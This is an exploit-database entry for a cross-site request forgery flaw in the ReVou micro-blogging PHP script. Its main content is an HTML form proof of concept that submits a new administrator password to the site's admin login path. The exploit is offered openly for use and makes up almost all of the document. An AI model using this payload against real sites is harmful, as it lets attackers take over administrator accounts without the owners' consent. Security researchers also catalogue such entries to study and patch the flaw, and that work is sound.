id: 17852
date: 03/28/2012
title: ReVou Micro Blogging CSRF Vulnerability
author: Jonturk75
cves: 

# Exploit Title: ReVou Micro Blogging CSRF
# Author: Jonturk75
# Vendor or Software Link: http://www.scripts.com/viewscript/revou-micro-blogging-twitter-clone-php-script/23855/
# Category::  webapps
# Demo : http://www.revou.com/demo/adminlogin/
# Greetz: Inj3ct0r Exploit DataBase 1337day.com


<form action='target.com/[PATH]/adminlogin/' method='get'>
<input name="newpass1" id="newpass1" maxlength="140" class="wpisz_cos" type="password">
<input name="newpass2" id="newpass2" maxlength="140" class="wpisz_cos" type="password">
<input name="ok" value="Change" type="submit">
</form>



#  0day.today [2023-03-24]  #